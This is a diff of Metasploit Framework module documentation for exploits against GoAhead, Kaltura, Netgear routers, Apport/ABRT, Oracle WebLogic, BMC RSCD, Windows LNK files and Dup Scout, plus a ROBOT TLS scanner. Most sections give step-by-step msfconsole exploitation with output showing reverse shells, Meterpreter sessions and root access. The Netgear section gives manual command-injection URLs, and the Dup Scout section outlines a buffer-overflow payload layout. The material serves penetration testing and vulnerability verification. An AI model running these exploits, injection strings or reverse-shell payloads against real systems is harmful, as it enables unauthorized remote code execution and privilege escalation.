+* WolfSSL < 3.12.2 (CVE 2017-13099)
+* MatrixSSL 3.8.3 (CVE 2016-6883)
+* Oracle Java <= 7u7, <= 6u35, <= 5u36, <= 1.4.2_38  (CVE 2012-5081)
+* IBM Domino
+* Palo Alto PAN-OS
+
+(source: [https://robotattack.org/#patches](https://robotattack.org/#patches))
+
+## Extra requirements
+
+This module requires a working Python 3 install with the `cryptography` and `gmpy2` packages installed (e.g. via `pip3 install cryptography gmpy2`).
+
+## Verification Steps
+
+Perhaps the easiest way to reproduce is to install an older version of Erlang on Linux (the stock `erlang` package on Ubuntu 17.10 and before is unpatched), and run the [ssl_hello_world](https://github.com/ninenines/cowboy/tree/master/examples/ssl_hello_world) example from Cowboy (additionally requires `git` and `make`, be sure to use the 1.1.x branch for Erlang < 19).
+
+```
+msf4 > use auxiliary/scanner/ssl/robot 
+msf4 auxiliary(scanner/ssl/robot) > set RHOSTS 192.168.244.128
+RHOSTS => 192.168.244.128
+msf4 auxiliary(scanner/ssl/robot) > set RPORT 8443
+RPORT => 8443
+msf4 auxiliary(scanner/ssl/robot) > set VERBOSE true
+VERBOSE => true
+msf4 auxiliary(scanner/ssl/robot) > run
+
+[*] Running for 192.168.244.128...
+[*] 192.168.244.128:8443 - Scanning host for Bleichenbacher oracle
+[*] 192.168.244.128:8443 - RSA N: 0xcdb5b51a3102cc751cfd6493a8b8801aa8c235c711e6c6954beca8cf648f461a68c9fd3fa81ad7e41634b739a0a33a138917c4e300a2543f7d09cf83ae9fc5338f6be04a59768708a2fa6b98e9affe0c24a23f79cda03a3ca367d4e7660e9da1c09b17d999b79296c65194f18c392471c9a051be048cbeea347abbb1a42d8af5
+[*] 192.168.244.128:8443 - RSA e: 0x10001
+[*] 192.168.244.128:8443 - Modulus size: 1024 bits, 128 bytes
+[+] 192.168.244.128:8443 - Vulnerable: (strong) oracle found TLSv1.2 with standard message flow
+[*] 192.168.244.128:8443 - Result of good request:                        TLS alert 10 of length 7
+[*] 192.168.244.128:8443 - Result of bad request 1 (wrong first bytes):   TLS alert 51 of length 7
+[*] 192.168.244.128:8443 - Result of bad request 2 (wrong 0x00 position): TLS alert 10 of length 7
+[*] 192.168.244.128:8443 - Result of bad request 3 (missing 0x00):        TLS alert 51 of length 7
+[*] 192.168.244.128:8443 - Result of bad request 4 (bad TLS version):     TLS alert 10 of length 7
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf4 auxiliary(scanner/ssl/robot) > 
+```
+
+## Options
+
+The scanner takes the normal `RHOSTS` and `RPORT` options to specify the hosts to scan on the port on which to scan them. In addition, it takes two options for the TLS behaviour: `cipher_group` and `timeout`.
+
+The `cipher_group` option:
+
+Select the ciphers to use to negotiate: all TLS_RSA ciphers (`all`, the default), TLS_RSA_WITH_AES_128_CBC_SHA (`cbc`), or TLS-RSA-WITH-AES-128-GCM-SHA256 (`gcm`).
+
+```
+set cipher_group gcm
+```
+
+The `timeout` option:
+
+Set the interval to wait before considering the TLS connection timed out. The default is 5 seconds.
+
+```
+set timeout 10
+```

documentation/modules/exploit/linux/http/goahead_ldpreload.md

@@ -0,0 +1,121 @@
+## Vulnerable Application
+
+  The GoAhead httpd server between versions 2.5 and 3.6.4 are vulnerable to an arbitrary code execution
+  vulnerability where a remote attacker can force a supplied shared library to be loaded into the process
+  of a CGI application. This module delivers a shared library payload as the raw data to a POST request
+  and forces this to be loaded by specifying a `LD_PRELOAD` value of `/proc/self/fd/0`.
+
+### Kali 2017.3 and Ubuntu 16.04 Install Instructions
+
+These instructions are based on the vulerability analysis by [elttam.com.au](https://www.elttam.com.au/blog/goahead/)
+
+```
+git clone https://github.com/embedthis/goahead.git
+cd goahead/
+git checkout tags/v3.6.4 -q
+make > /dev/null
+cd test
+gcc ./cgitest.c -o cgi-bin/cgitest
+../build/linux-x64-default/bin/goahead . 127.1.1.1:8080
+```
+
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/goahead_ldpreload```
+  4. Do: ```set rhost [ip]```
+  5. Do: ```exploit```
+  6. You should get a shell.
+
+## Options
+
+  **TARGET_URI**
+
+  Optional. The full path to a CGI endpoint on the target server.
+
+## Scenarios
+
+### GoAhead 3.6.4 on Ubuntu 16.04 x64
+
+```
+
+msf> use exploit/linux/http/goahead_preload
+msf exploit(goahead_ldpreload) > set RHOST 127.1.1.1
+msf exploit(goahead_ldpreload) > set RPORT 8080
+msf exploit(goahead_ldpreload) > check
+
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[+] 127.1.1.1:8080 The target is vulnerable.
+
+msf exploit(goahead_ldpreload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[*] Command shell session 4 opened (127.0.0.1:4444 -> 127.0.0.1:32988) at 2017-12-28 16:26:50 -0600
+
+uname -a
+Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+exit
+
+msf exploit(goahead_ldpreload) > set TARGET 1
+msf exploit(goahead_ldpreload) > unset PAYLOAD
+msf exploit(goahead_ldpreload) > exploit
+
+[*] Started bind handler
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[*] Command shell session 5 opened (127.0.0.1:30836 -> 127.1.1.1:4444) at 2017-12-28 16:28:04 -0600
+
+uname -a
+Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+exit
+
+msf exploit(goahead_ldpreload) > set TARGET 2
+msf exploit(goahead_ldpreload) > unset PAYLOAD
+msf exploit(goahead_ldpreload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP double handler on 127.0.0.1:4444
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo sNRXNjxWl7ic0uWw;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "sNRXNjxWl7ic0uWw\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 6 opened (127.0.0.1:4444 -> 127.0.0.1:32995) at 2017-12-28 16:28:56 -0600
+
+uname -a
+Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+
+
+msf exploit(goahead_ldpreload) > set TARGET 4
+msf exploit(goahead_ldpreload) > unset PAYLOAD
+msf exploit(goahead_ldpreload) > exploit
+
+[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
+[*] Started reverse TCP handler on 127.0.0.1:4444
+[*] Searching 390 paths for an exploitable CGI endpoint...
+[+] Exploitable CGI located at /cgi-bin/cgitest
+[*] Command shell session 7 opened (127.0.0.1:4444 -> 127.0.0.1:33000) at 2017-12-28 16:29:34 -0600
+
+uname -a
+Linux smash 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+
+```
+
+
+## Logging
+
+Each 404 error will generate a console or log entry similar to `goahead: 0: Cannot find CGI program:`.

documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md

@@ -0,0 +1,42 @@
+## Description 
+
+The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie. 
+ 
+
+## Vulnerable Application
+
+ This module exploits a remote code execution within the Kaltura(<=13.1.0) via a cookie deserialization.
+ Vulnerability reference- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143.
+ Installation of Kaltura is difficult, but here is an installation guide:
+ https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md
+
+
+## Verification Steps
+
+ 1. Start msfconsole
+ 2. `use exploit/linux/http/kaltura_unserialize_cookie_rce`
+ 3. `set RHOST https://example.com (or IP address)`
+ 4. `set ENTRYID 0_xxxxxxxx`
+ 5. `set payload generic/custom`
+ 6. `set payloadstr "system('command you want to execute, eg.- ls -la');"`
+ 7. `run`
+
+## Scenarios
+
+ ```
+ msf use exploits/linux/http/kaltura_unserialize_cookie_rce
+ msf exploit(kalkutra_unseialize_cookie_rce) set RHOST 46.101.209.202
+ RHOST => 46.101.209.202
+ msf exploit(kalkutra_unseialize_cookie_rce) set LHOST 192.168.1.16
+ LHOST => 192.168.1.16
+ msf exploit(kalkutra_unseialize_cookie_rce)>check
+ [+] 46.101.209.202:4444 The target is vulnerable.
+ msf exploit(kalkutra_unseialize_cookie_rce)>run
+ [*] Started bind handler
+ [*] Output:
+ [*] Command shell session 1 opened (192.168.1.16:36865 -> 46.101.209.202:4444) at 2017-09-04 12:09:03 +0200
+
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  ```
+

documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md

@@ -7,8 +7,8 @@
   1. start `msfconsole`
   2. `use exploit/linux/http/netger_dnslookup_cmd_exec`
   3. `set RHOST 192.168.1.1` `<--- Router IP`
-  4. `set USERNAME xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
-  5. `set PASSWORD xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
+  4. `set USERNAME xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
+  5. `set PASSWORD xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
   5. `set PAYLOAD cmd/unix/reverse_bash`
   6. `set LHOST 192.168.1.x`
   7. `set LPORT xxxx`

documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md

@@ -1,4 +1,5 @@
-The netgear_r7000_cgibin_exec module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
+## Introduction
+The `netgear_r7000_cgibin_exec` module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
 
 
 ## Vulnerable Application

documentation/modules/exploit/linux/local/apport_abrt_chroot_priv_esc.md

@@ -0,0 +1,73 @@
+## Description
+
+  This module attempts to gain root privileges on Ubuntu and Fedora systems by invoking the default coredump handler inside a namespace ("container").
+
+
+## Vulnerable Application
+
+  Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are vulnerable, due to a feature which allows forwarding reports to a container's Apport by changing the root directory before loading the crash report, causing `usr/share/apport/apport` within the crashed task's directory to be executed.
+
+  Similarly, Fedora is vulnerable when the kernel crash handler is configured to change root directory before executing ABRT, causing `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to be executed. Fedora's crash handler was reportedly configured to chroot ABRT by default between April and August 2014.
+
+  In both instances, the crash handler does not drop privileges, resulting in code execution as root.
+
+  This module has been tested successfully on:
+
+  * Apport 2.14.1 on Ubuntu 14.04.1 LTS x86 and x86_64
+  * ABRT on Fedora 19 and 20 x86_64
+
+  To test Fedora 20, disable SELinux, reboot, and modify `/proc/sys/kernel/core_pattern` to make use of the vulnerable `core_pattern` : `|/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e`
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Do: `use exploit/linux/local/apport_abrt_chroot_priv_esc`
+  4. Do: `set SESSION [SESSION]`
+  5. Do: `check`
+  6. Do: `run`
+  7. You should get a new root session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+  ```
+  msf > use exploit/linux/local/apport_abrt_chroot_priv_esc
+  msf exploit(linux/local/apport_abrt_chroot_priv_esc) > set session 1
+  session => 1
+  msf exploit(linux/local/apport_abrt_chroot_priv_esc) > run
+
+  [!] SESSION may not be compatible with this module.
+  [*] Started reverse TCP handler on 172.16.191.244:4444 
+  [*] Writing '/tmp/.drY6cJZ' (887316 bytes) ...
+  [*] Writing '/tmp/.LtJvrgjXq' (207 bytes) ...
+  [*] Launching exploit...
+  [+] Upgraded session to root privileges ('uid=0(root) gid=1000(user) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare),1000(user)')
+  [*] Sending stage (857352 bytes) to 172.16.191.252
+  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.252:35552) at 2018-01-11 09:58:25 -0500
+  [+] Deleted /tmp/.drY6cJZ
+  [+] Deleted /tmp/.LtJvrgjXq
+
+  meterpreter > getuid
+  Server username: uid=0, gid=1000, euid=0, egid=1000
+  meterpreter > sysinfo
+  Computer     : 172.16.191.252
+  OS           : Ubuntu 14.04 (Linux 3.13.0-32-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter > 
+  ```
+

documentation/modules/exploit/multi/fileformat/office_word_macro.md

@@ -75,7 +75,9 @@ If you already have Microsoft Office, you can use it to create a docx file and u
 
 ## Options
 
-**CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit.
+**CUSTOMTEMPLATE** 
+
+A docx file that will be used as a template to build the exploit.
 
 ## Trusted Document
 

documentation/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce.md

@@ -0,0 +1,95 @@
+# Description
+
+This module works leverages [CVE-2017-10271](https://nvd.nist.gov/vuln/detail/CVE-2017-10271) against Oracle WebLogic Server's  Web Service Atomic Transaction API a XML SOAP request to create a `java.lang.ProcessBuilder` object to provide unauthenticated arbitrary command execution.  A command line can be acquired through the use of `cmd/unix/reverse_python`.
+
+Note that the TARGET must be set to match either a Windows or Unix-based host.  If the TARGET variable is set improperly, a log entry will be generated on a vulnerable server, but the server will not crash.  For example, a Linux payload sent to a Windows server will output:
+
+```
+java.io.IOException: Cannot run program "/bin/sh": CreateProcess error=2, The system cannot find the file specified
+Continuing ...
+```
+
+# Vulnerable Application
+
+Oracle WebLogic server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0 with access to Web Services Atomic Transaction (WS-AT) endpoints are vulnerable to unauthenticated arbitrary command execution.
+
+### Windows: Setting up a vulnerable application
+
+We successfully tested this exploit against a fully-patched, Windows 10 (x64) target.  Since WebLogic is resource intensive, consider providing four cores and 8GB of RAM.
+
+1. [Download](http://www.oracle.com/technetwork/middleware/weblogic/downloads/wls-main-097127.html) Oracle WebLogic Server 10.3.6, using the "Windows x86 with 32-bit JVM" (`wls1036_win32.exe`).
+2. Run the installer.  (See [here] for detailed instructions.)  You may be prompted to install a Java Development Kit (JDK).  [JDK 8u151 x64](http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html) was verified working.
+3. Windows Defender will block the payload from executing, so you may need to [temporarily](https://support.microsoft.com/en-us/help/4027187/windows-turn-off-windows-defender-antivirus) or [permanently](https://www.windowscentral.com/how-permanently-disable-windows-defender-windows-10) disable it.
+4. Run the configuration wizard and [create a new weblogic domain](https://docs.oracle.com/cd/E29542_01/web.1111/e14140/newdom.htm#WLDCW192).  Domain names and credentials are irrelevant.  At the conclusion of the wizard, click "Start Admin Server".
+5. The `startWebLogic.cmd` should run immediately after the installer and present logging output.  Once running, the window should output a line similar to the following
+```
+<Jan 11, 2018 1:30:49 PM CST> <Notice> <WebLogicServer> <BEA-000365> <Server state changed to RUNNING>
+<Jan 11, 2018 1:30:49 PM CST> <Notice> <WebLogicServer> <BEA-000360> <Server started in RUNNING mode>
+```
+
+### Windows: Attacking a vulnerable application
+
+Attack the above Windows server using the `exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`:
+
+```
+msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of your target]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 0
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/windows/reverse_powershell
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of your attacker]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run
+
+[*] Started reverse TCP handler on 192.168.108.1:4444
+[*] Command shell session 1 opened (192.168.108.1:4444 -> 192.168.108.132:50060) at 2018-01-11 11:48:16 -0600
+
+Microsoft Windows [Version 10.0.16299.192]
+(c) 2017 Microsoft Corporation. All rights reserved.
+
+C:\Oracle\Middleware\user_projects\domains\admindomain>whoami
+weblogic-server\Administrator
+```
+
+### Unix: Setting up a vulnerable environment
+
+1. If necessary, install Docker.io.  [These instructions](https://www.ptrace-security.com/2017/06/14/how-to-install-docker-on-kali-linux-2017-1/) were tested on a Kali 2017.3 VM:
+
+```
+apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
+echo 'deb https://apt.dockerproject.org/repo debian-stretch main' > /etc/apt/sources.list.d/docker.list
+apt update
+apt-get install docker-engine
+service docker start
+docker run hello-world
+```
+
+2. Install a container running Ubuntu 16.04 and WebLogic 10.3.6.0:
+```
+docker run -d -p7001:7001 -p80:7001 kkirsche/cve-2017-10271
+```
+
+3. Confirm that the container is up.
+```
+docker ps
+```
+
+### Unix: Attacking a vulnerable application
+
+Attack the above Unix server using the `exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`:
+
+```
+msf > use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set RHOST [IP address of the target]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set TARGET 1
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set PAYLOAD cmd/unix/reverse_python
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > set LHOST [IP address of the attacker]
+msf exploit(multi/http/oracle_weblogic_wsat_deserialization_rce) > run
+
+[*] Started reverse TCP handler on 192.168.108.1:4444
+[*] Command shell session 5 opened (192.168.108.1:4444 -> 192.168.108.129:51312) at 2018-01-11 11:46:49 -0600
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+# Credits
+Documentation originally written by Aaron Soto (@asoto-r7) and was edited by Kevin Kirsche (@kkirsche).

documentation/modules/exploit/multi/local/allwinner_backdoor.md

@@ -1,10 +1,12 @@
-  Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
-  Vulnerable OS: all OS images available for Orange Pis,
+## Introduction
+
+Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
+Vulnerable OS: all OS images available for Orange Pis,
 				 any for FriendlyARM's NanoPi M1,
 				 SinoVoip's M2+ and M3,
 				 Cuebietech's Cubietruck +
 				 Linksprite's pcDuino8 Uno
-  Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
+Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
 
 This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).  It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
 

documentation/modules/exploit/multi/misc/bmc_server_automation_rscd_nsh_rce.md

@@ -0,0 +1,88 @@
+## Description
+This module exploits a weak access control check in the BMC Server Automation RSCD agent that allows arbitrary operating system commands to be executed without authentication.
+
+Affected versions of the BMC RSCD agent fail to enforce authentication controls at the server side enabling a rogue client to send an authentication message, ignore the response, and continue interacting with the agent as though the authentication was successful. This module takes advantage of this vulnerability to execute arbitrary operating system commands using the BMC network shell (NSH) functionality.
+
+The access control vulnerability itself was identified by Olga Yanushkevich of [ERNW](https://www.ernw.de/) and was assigned [CVE-2016-1542](https://www.cvedetails.com/cve/CVE-2016-1542/) and [CVE-2016-1543](https://www.cvedetails.com/cve/CVE-2016-1543/). Further details can be found at the [ERNW Insinuator website](https://insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/).
+
+Technical details of the RCE exploit can be found [here](https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/) and [here](https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/).
+
+## Vulnerable Application
+The module affects the RSCD agent component of [BMC BladeLogic Server Automation](http://www.bmcsoftware.uk/it-solutions/bladelogic-server-automation.html). The agent is installed on servers managed using BMC BladeLogic Server Automation and listens on TCP port 4750. The vulnerability affects versions 8.x below 8.6 SP1 Patch 2, 8.7 Patch 3, and 8.8. More details on affected versions and the fix can be found from the [BMC Knowledgebase](https://selfservice.bmc.com/casemgmt/sc_KnowledgeArticle?sfdcid=kA214000000dBpnCAE&type=Solution).
+
+## Verification Steps
+To use this exploit you will need access to BMC BladeLogic Server Automation.
+
+1. Install the RSCD agent on a host as detailed in the [BMC documentation](https://docs.bmc.com/docs/ServerAutomation/89/agent-installation-overview-653394992.html).
+2. Ensure that the RSCD service is running and listening on TCP port 4750.
+3. Launch `msfconsole`.
+4. Load the module `use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce`.
+5. Select the generic command target `set target 3`.
+6. Select a generic command payload `set payload cmd/unix/generic` or `set payload cmd/windows/generic`.
+7. Set the command to execute `set CMD "echo MSF"` or `set CMD "cmd /c echo MSF"`.
+8. Run the exploit `exploit`.
+
+The result should be that the string `MSF` is returned and output.
+
+## Usage Scenarios
+The exploit module contains several targets as detailed below.
+
+### Target 0: Automatic
+The automatic target causes the module to issue an `agentinfo` request to the target in an attempt to identify the target operating system. If it appears to be a Windows target then the module behaves as though target 1 was selected, otherwise it behaves as though target 2 was selected.
+
+### Target 1: Windows/VBS Stager
+This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell).
+
+	msf > use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce
+	msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set RHOST 34.239.181.84
+	RHOST => 34.239.181.84
+	msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set LHOST 54.164.112.135
+	LHOST => 54.164.112.135
+	msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set TARGET 1
+	TARGET => 1
+	msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
+	PAYLOAD => windows/meterpreter/reverse_tcp
+	msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > exploit
+	[*] Exploit running as background job 1.
+	msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) >
+	[*] Started reverse TCP handler on 0.0.0.0:4444
+	[*] 34.239.181.84:4750 - Command Stager progress -   8.01% done (8099/101056 bytes)
+	[*] 34.239.181.84:4750 - Command Stager progress -  16.03% done (16198/101056 bytes)
+	[*] 34.239.181.84:4750 - Command Stager progress -  24.04% done (24297/101056 bytes)
+	[*] 34.239.181.84:4750 - Command Stager progress -  32.06% done (32396/101056 bytes)
+	[*] 34.239.181.84:4750 - Command Stager progress -  40.07% done (40495/101056 bytes)
+	[*] 34.239.181.84:4750 - Command Stager progress -  48.09% done (48594/101056 bytes)
+	[*] 34.239.181.84:4750 - Command Stager progress -  56.10% done (56693/101056 bytes)
+	[*] 34.239.181.84:4750 - Command Stager progress -  64.11% done (64792/101056 bytes)
+	[*] 34.239.181.84:4750 - Command Stager progress -  72.13% done (72891/101056 bytes)
+	[*] 34.239.181.84:4750 - Command Stager progress -  80.14% done (80990/101056 bytes)
+	[*] 34.239.181.84:4750 - Command Stager progress -  88.16% done (89089/101056 bytes)
+	[*] 34.239.181.84:4750 - Command Stager progress -  96.17% done (97188/101056 bytes)
+	[*] 34.239.181.84:4750 - Command Stager progress - 100.00% done (101056/101056 bytes)
+	[*] Sending stage (179779 bytes) to 34.239.181.84
+	[*] Meterpreter session 1 opened (172.31.58.107:4444 -> 34.239.181.84:56233) at 2018-01-14 00:54:49 +0000
+
+### Target 2: Unix/Linux
+This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Unix/Linux targets in the same way as target 1.
+
+### Target 3: Generic Cmd
+This target can be used with *cmd* payloads to execute operating system commands against the target host.
+
+	msf > use exploit/multi/misc/bmc_server_automation_rscd_nsh_rce
+	msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set RHOST 34.239.181.84
+	RHOST => 34.239.181.84
+	msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set TARGET 3
+	TARGET => 3
+	msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set PAYLOAD cmd/windows/generic
+	PAYLOAD => cmd/windows/generic
+	msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > set CMD "cmd /c whoami"
+	CMD => cmd /c whoami
+	msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) > exploit
+	[*] Exploit running as background job 2.
+	msf exploit(multi/misc/bmc_server_automation_rscd_nsh_rce) >
+	[+] 34.239.181.84:4750 - Output
+	ip-ac1f1eb2\bladelogicrscd
+
+#### Windows Hosts
+When using this module target against Windows hosts, non-powershell command lines are limited to around 8,100 characters and generally have to be prefixed with `cmd /c`.
+Powershell commands are executed differently and have a much larger length limit of around 32,700 characters.

documentation/modules/exploit/multi/script/web_delivery.md

@@ -1,3 +1,5 @@
+## Introduction
+
 The web_delivery module provides a stealthy way to deliver a payload during post exploitation over HTTP or HTTPS. Because the payload does not touch the disk, it can easily bypass many anti-virus protections.
 
 The web_delivery module supports three different languages for delivery: Python, PHP, and
@@ -5,6 +7,7 @@ Powershell. You should manually select the correct target based on the victim en
 
 For example, if you have gained remote access through a PHP application, it is likely you can use PHP. If you are in a modern Windows server environment, then you can usually assume the target supports Powershell as well.
 
+
 ## Verification Steps
 
 To use the web_delivery module, you must first gain access to the target host and be able to execute either a Python, PHP, or Powershell interpreter. Then, follow these steps to proceed with exploitation:

documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md

@@ -7,8 +7,7 @@ A fix was released in the June 2017 Patch Tuesday.
 
 ## Vulnerable Setup
 
-To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed.
-
+To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464.
 ## Verification Steps
 
 ### Start a handler
@@ -16,7 +15,6 @@ To set up the vulnerable environment, install a Windows version without the patc
   2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
   3. `set LHOST [ip victim connects back to]`
   4. `exploit -j`
-  5. `back`
 
 ### Run the exploit
 

documentation/modules/exploit/windows/fileformat/dupscout_xml.md

@@ -0,0 +1,80 @@
+## Description
+
+This module exploits a buffer overflow in `libpal.dll` that is used by [Dup Scout Enterprise v10.4.16](http://www.dupscout.com/setups/dupscoutent_setup_v10.4.16.exe). The buffer overflow occurs during a call to the `SCA_XmlParser::GetToken` function when a user-supplied Command file with a crafted name attribute is imported to the Dup Scout application. The `SCA_XmlParser::GetToken` function is passed a heap pointer as an argument, which was created by the `SCA_XmlParser::LoadXmlFile` function and contains data from the user-supplied Command file, and a pointer to a stack buffer that was created in the `SCA_XmlParser::ParseXmlElement` function. While parsing the name attribute, the `SCA_XmlParser::GetToken` function copies from the heap buffer to the stack buffer until a single quote (to match `name='`, or a double quote to match `name="`) is found or until it finishes reading from the allocated heap buffer.
+
+## Vulnerable Application
+
+The vulnerability can be exploited when the size of the name attribute is greater than 1560 bytes.
+
+Note: The allocated stack buffer size is 1564 bytes but the first four bytes are filled with `\xff` during execution of the `SCA_XmlParser::GetToken` function.
+
+Since the stack buffer was allocated as a local variable for the `SCA_XmlParser::ParseXmlElement` function, the program's control flow isn't taken over until the return of the `SCA_XmlParser::ParseXmlElement` function even though the return value is overwritten during execution of the `SCA_XmlParser::GetToken` function.
+
+The format of the crafted Command file will be:
+
+```
+buf = "<?xml ?><a name='"
+buf << make_nops(1560)   # Fill up the stack buffer
+buf << addr_of_jmp_esp   # overwrite the return address for SCA_XmlParser::ParseXmlElement
+buf << make_nops(16)     # account for ret 10h in SCA_XmlParser::ParseXmlElement
